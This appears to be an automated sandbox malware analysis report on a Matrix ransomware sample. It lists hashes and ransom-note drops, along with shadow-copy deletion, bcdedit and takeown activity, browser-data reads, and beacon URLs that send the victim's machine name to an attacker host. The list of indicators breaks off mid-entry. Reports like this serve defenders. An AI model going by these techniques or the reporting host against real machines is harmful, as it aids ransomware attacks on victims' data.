Analysis
-
max time kernel
4294182s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20220223-en -
submitted
06-03-2022 01:17
Static task
static1
Behavioral task
behavioral1
Sample
3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
Resource
win10v2004-en-20220112
General
-
Target
3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe
-
Size
1.5MB
-
MD5
c3376b76d094ec9af26b125dceb9abab
-
SHA1
42f96a7dda594cf5ba26c4c302366cca54a5e794
-
SHA256
3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad
-
SHA512
1a1e11996f6407378ac1a758001e4d71508a3593862a8b4b26f764924f71ddb8e2ea66d67c3794d31e84274d23e355e93275151aff9a70134bb776b1fa3b040e
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\Favorites\MSN Websites\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.default-release\storage\default\moz-extension+++fa070f1c-a2b4-4179-b766-c7aa09203140^userContextId=4294967295\idb\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files (x86)\Google\Update\1.3.36.71\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\Mahjong\fr-FR\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\ProgramData\Microsoft\MF\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\More Games\ja-JP\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\Hearts\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\Hearts\es-ES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\Purble Place\it-IT\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe HTTP URL 3 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=GZAATBZA|Admin&sid=ugk4MBwuPj1d1tmZ&phase=START Process not Found File created C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\ProgramData\Adobe\Updater6\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe HTTP URL 4 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=GZAATBZA|Admin&sid=ugk4MBwuPj1d1tmZ&phase=[ALL]2481EF2E7EC0A3C7 Process not Found File created C:\Program Files\Microsoft Games\FreeCell\es-ES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\FreeCell\it-IT\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Google\Chrome\Application\Dictionaries\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\Mahjong\it-IT\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Microsoft Games\Mahjong\ja-JP\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\faxxuvis.Admin\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe HTTP URL 13 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=GZAATBZA|Admin&sid=ugk4MBwuPj1d1tmZ&phase=FINISH Process not Found File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\ProgramData\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Users\Admin\Desktop\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\Java\jre7\lib\fonts\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#FOX_README#.rtf 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1076 bcdedit.exe 980 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 268 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS BtmmyzQx64.exe -
Executes dropped EXE 64 IoCs
pid Process 1164 NWqzv3Ha.exe 1532 BtmmyzQx.exe 888 BtmmyzQx64.exe 788 BtmmyzQx.exe 1108 BtmmyzQx.exe 572 BtmmyzQx.exe 432 BtmmyzQx.exe 632 BtmmyzQx.exe 240 BtmmyzQx.exe 1636 BtmmyzQx.exe 572 BtmmyzQx.exe 912 BtmmyzQx.exe 1408 BtmmyzQx.exe 2008 BtmmyzQx.exe 1636 BtmmyzQx.exe 1928 BtmmyzQx.exe 1924 BtmmyzQx.exe 1932 BtmmyzQx.exe 600 BtmmyzQx.exe 1680 BtmmyzQx.exe 1908 BtmmyzQx.exe 1652 BtmmyzQx.exe 268 BtmmyzQx.exe 1712 BtmmyzQx.exe 572 BtmmyzQx.exe 836 BtmmyzQx.exe 844 BtmmyzQx.exe 1928 BtmmyzQx.exe 1104 BtmmyzQx.exe 1972 BtmmyzQx.exe 1592 BtmmyzQx.exe 768 BtmmyzQx.exe 912 BtmmyzQx.exe 1552 BtmmyzQx.exe 1932 BtmmyzQx.exe 1908 BtmmyzQx.exe 1968 BtmmyzQx.exe 1688 BtmmyzQx.exe 208 BtmmyzQx.exe 828 BtmmyzQx.exe 892 BtmmyzQx.exe 972 BtmmyzQx.exe 1060 BtmmyzQx.exe 912 BtmmyzQx.exe 1652 BtmmyzQx.exe 1340 BtmmyzQx.exe 1004 BtmmyzQx.exe 1648 BtmmyzQx.exe 864 BtmmyzQx.exe 1456 BtmmyzQx.exe 1620 BtmmyzQx.exe 956 BtmmyzQx.exe 768 BtmmyzQx.exe 1648 BtmmyzQx.exe 800 BtmmyzQx.exe 1724 BtmmyzQx.exe 208 BtmmyzQx.exe 892 BtmmyzQx.exe 1924 BtmmyzQx.exe 1636 BtmmyzQx.exe 1648 BtmmyzQx.exe 1152 BtmmyzQx.exe 1724 BtmmyzQx.exe 960 BtmmyzQx.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\ResolveExit.tiff 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Pictures\PushRemove.tiff 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Pictures\CompleteRestart.tiff 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Pictures\WatchSet.tiff 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Pictures\StopSet.tiff 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Pictures\UnlockCheckpoint.tiff 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000600000001448f-69.dat upx behavioral1/files/0x000600000001448f-70.dat upx behavioral1/files/0x000600000001448f-71.dat upx behavioral1/files/0x000600000001448f-75.dat upx behavioral1/files/0x000600000001448f-76.dat upx behavioral1/files/0x000600000001448f-78.dat upx behavioral1/files/0x000600000001448f-79.dat upx behavioral1/files/0x000600000001448f-82.dat upx behavioral1/files/0x000600000001448f-81.dat upx behavioral1/files/0x000600000001448f-84.dat upx behavioral1/files/0x000600000001448f-85.dat upx behavioral1/files/0x000600000001448f-88.dat upx behavioral1/files/0x000600000001448f-89.dat upx behavioral1/files/0x000600000001448f-91.dat upx behavioral1/files/0x000600000001448f-92.dat upx behavioral1/files/0x000600000001448f-95.dat upx behavioral1/files/0x000600000001448f-94.dat upx behavioral1/files/0x000600000001448f-98.dat upx behavioral1/files/0x000600000001448f-97.dat upx behavioral1/files/0x000600000001448f-100.dat upx behavioral1/files/0x000600000001448f-103.dat upx behavioral1/files/0x000600000001448f-101.dat upx behavioral1/files/0x000600000001448f-104.dat upx behavioral1/files/0x000600000001448f-107.dat upx behavioral1/files/0x000600000001448f-106.dat upx behavioral1/files/0x000600000001448f-109.dat upx behavioral1/files/0x000600000001448f-110.dat upx behavioral1/files/0x000600000001448f-113.dat upx behavioral1/files/0x000600000001448f-112.dat upx behavioral1/files/0x000600000001448f-115.dat upx behavioral1/files/0x000600000001448f-116.dat upx behavioral1/files/0x000600000001448f-118.dat upx behavioral1/files/0x000600000001448f-119.dat upx behavioral1/files/0x000600000001448f-122.dat upx behavioral1/files/0x000600000001448f-121.dat upx behavioral1/files/0x000600000001448f-124.dat upx behavioral1/files/0x000600000001448f-125.dat upx behavioral1/files/0x000600000001448f-128.dat upx behavioral1/files/0x000600000001448f-127.dat upx behavioral1/files/0x000600000001448f-131.dat upx behavioral1/files/0x000600000001448f-130.dat upx behavioral1/files/0x000600000001448f-134.dat upx behavioral1/files/0x000600000001448f-133.dat upx behavioral1/files/0x000600000001448f-136.dat upx behavioral1/files/0x000600000001448f-137.dat upx behavioral1/files/0x000600000001448f-140.dat upx behavioral1/files/0x000600000001448f-139.dat upx behavioral1/files/0x000600000001448f-143.dat upx behavioral1/files/0x000600000001448f-142.dat upx behavioral1/files/0x000600000001448f-146.dat upx behavioral1/files/0x000600000001448f-145.dat upx behavioral1/files/0x000600000001448f-148.dat upx behavioral1/files/0x000600000001448f-151.dat upx behavioral1/files/0x000600000001448f-149.dat upx -
Loads dropped DLL 64 IoCs
pid Process 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 1616 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe 364 cmd.exe 1532 BtmmyzQx.exe 304 cmd.exe 1736 cmd.exe 1392 cmd.exe 1652 cmd.exe 1700 cmd.exe 1648 cmd.exe 1972 cmd.exe 1680 cmd.exe 1928 cmd.exe 980 cmd.exe 520 cmd.exe 1064 cmd.exe 912 cmd.exe 1496 cmd.exe 1968 cmd.exe 1124 cmd.exe 1736 cmd.exe 1572 cmd.exe 980 cmd.exe 1700 cmd.exe 2008 cmd.exe 1688 cmd.exe 632 cmd.exe 1988 cmd.exe 1700 cmd.exe 1652 cmd.exe 520 cacls.exe 432 cmd.exe 1456 cmd.exe 836 cmd.exe 232 cmd.exe 1152 cmd.exe 892 cmd.exe 1156 cmd.exe 236 cmd.exe 1456 cmd.exe 1712 cmd.exe 1924 cmd.exe 228 cmd.exe 1968 cmd.exe 1912 cmd.exe 1124 cmd.exe 768 cmd.exe 664 cmd.exe 2008 cmd.exe 220 cmd.exe 208 cmd.exe 884 cmd.exe 1712 cmd.exe 980 cmd.exe 1824 cmd.exe 1004 cmd.exe 1076 cmd.exe 1092 cmd.exe 1928 cmd.exe 1620 cmd.exe 228 cmd.exe 1156 cmd.exe 1688 cmd.exe 864 cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 1560 takeown.exe 956 takeown.exe 1124 takeown.exe 2008 takeown.exe 980 takeown.exe 236 takeown.exe 1496 takeown.exe 1188 takeown.exe 1712 takeown.exe 1648 takeown.exe 1564 takeown.exe 980 takeown.exe 864 takeown.exe 1908 takeown.exe 1572 takeown.exe 1844 takeown.exe 224 takeown.exe 224 takeown.exe 804 takeown.exe 240 takeown.exe 956 takeown.exe 1968 takeown.exe 1912 Process not Found 228 takeown.exe 1712 takeown.exe 1176 takeown.exe 980 takeown.exe 224 takeown.exe 928 Process not Found 772 Process not Found 1652 Process not Found 1076 takeown.exe 228 takeown.exe 1636 takeown.exe 768 takeown.exe 392 takeown.exe 1156 takeown.exe 1456 takeown.exe 1636 takeown.exe 1156 takeown.exe 1924 takeown.exe 236 takeown.exe 960 takeown.exe 1736 takeown.exe 432 Process not Found 828 takeown.exe 884 takeown.exe 520 takeown.exe 1836 takeown.exe 1688 takeown.exe 1908 takeown.exe 1836 takeown.exe 1572 takeown.exe 1152 takeown.exe 520 takeown.exe 828 takeown.exe 956 takeown.exe 2008 takeown.exe 240 takeown.exe 1652 takeown.exe 1824 takeown.exe 1636 takeown.exe 1408 takeown.exe 928 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 40 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Music\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\72C1GWO9\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\M7YMRK48\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Music\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files (x86)\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AZW6OKHO\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Links\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Documents\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AGWPI80M\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Videos\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\M: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\K: BtmmyzQx64.exe File opened (read-only) \??\V: BtmmyzQx64.exe File opened (read-only) \??\Z: BtmmyzQx64.exe File opened (read-only) \??\U: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\R: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\K: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\E: BtmmyzQx64.exe File opened (read-only) \??\G: BtmmyzQx64.exe File opened (read-only) \??\R: BtmmyzQx64.exe File opened (read-only) \??\Q: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\P: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\O: 3a597442f34e7152c58866bb1a14ac03dd7ff2b59834fb93e8f44390c7b5caad.exe File opened (read-only) \??\L: BtmmyzQx64.exe File opened 